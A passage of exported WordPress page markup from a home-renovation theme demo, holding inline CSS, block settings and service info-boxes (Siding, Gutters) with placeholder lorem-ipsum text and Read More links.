undefinedpx; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Siding</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":2,\"blockId\":\"767f5573-d592-456c-a81e-eac9c44adadf\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 2px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-767f5573-d592-456c-a81e-eac9c44adadf\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":29,\"title\":\"services-img3\",\"filename\":\"services-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"1df582acb1\",\"delete\":\"75ddbb8dd1\",\"edit\":\"b8f84e66c7\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=29u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2302,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":59,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"height\":67,\"width\":59,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":59,\"resshowPrefix\":false,\"counterId\":\"6a884b41-c026-4a57-9b2b-25862220e646\"} -->\n<style type=\"text/css\"> .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-image-content img {\n width: 59px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Gutters</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"ae0d7f03-a30d-438a-9db9-6de087194c7c\",\"topPadding\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-ae0d7f03-a30d-438a-9db9-6de087194c7c background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"7c398a30-3a74-4ab1-b45d-62ced1bb0f57\"} -->\n<style type=\"text/css\"> .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"aff0817d-6564-42a6-8efc-48ebb76c7727\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-aff0817d-6564-42a6-8efc-48ebb76c7727\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":\"2021-05-28T05:39:15.000Z\",\"filename\":\"floor-modification.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"alt\":\"\",\"title\":\"floor-modification\",\"caption\":\"\",\"description\":\"\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\",\"id\":258,\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/floor-modification/\",\"author\":\"1\",\"name\":\"floor-modification\",\"status\":\"inherit\",\"modified\":\"2021-05-28T05:39:15.000Z\",\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"dc1b7f19b6\",\"delete\":\"1f29bf8951\",\"edit\":\"ed86f5af8b\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=258u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":9306,\"filesizeHumanReadable\":\"9 KB\",\"context\":\"\",\"height\":66,\"width\":111,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\",\"height\":66,\"width\":111,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":111,\"resshowPrefix\":false,\"counterId\":\"e1ad1827-531b-40c1-8789-14bfbfe4da88\"} -->\n<style type=\"text/css\"> .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-image-content img {\n width: 111px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-e1ad1827-531b-40c1-8789-14bfbfe4da88 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Gutters</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis.<br>Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"567cec0e-bcfe-4c69-9c80-5643480659ef\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-567cec0e-bcfe-4c69-9c80-5643480659ef .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-567cec0e-bcfe-4c69-9c80-5643480659ef\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block 